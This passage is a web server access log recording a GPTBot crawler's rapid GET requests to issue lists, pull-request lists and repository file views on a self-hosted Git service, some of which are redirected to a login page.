"https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:29:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12217] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode" +[17/Feb/2026:19:29:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=open&type=all" +[17/Feb/2026:19:29:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=open&type=all" +[17/Feb/2026:19:29:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:29:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:29:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=farduedate&state=closed&type=all" +[17/Feb/2026:19:29:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:29:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:29:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:29:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:29:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11004] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:29:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:29:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:29:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:29:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:29:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9831] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:29:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11558] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:29:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12240] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:29:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11002] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:29:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11004] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:29:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 10978] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:29:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11004] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:29:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:29:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:29:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:29:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:29:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:29:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:29:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:29:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=farduedate&state=closed&type=all" +[17/Feb/2026:19:29:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11364] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:29:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11362] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:29:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol-Debug.exe?display=rendered" [Client 74.7.227.38] [Length 10895] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol-Debug.exe" +[17/Feb/2026:19:29:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py?display=rendered" [Client 74.7.227.38] [Length 11135] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py" +[17/Feb/2026:19:29:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3?display=source" [Client 74.7.227.38] [Length 11304] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:19:29:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:29:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libwinpthread-1.dll?display=rendered" [Client 74.7.227.38] [Length 11067] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libwinpthread-1.dll" +[17/Feb/2026:19:29:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:29:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:29:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:29:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:29:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:29:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:29:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:29:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:29:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:29:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:29:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:29:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:29:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:29:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10244] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:29:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:29:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:29:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:19:29:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:19:29:45 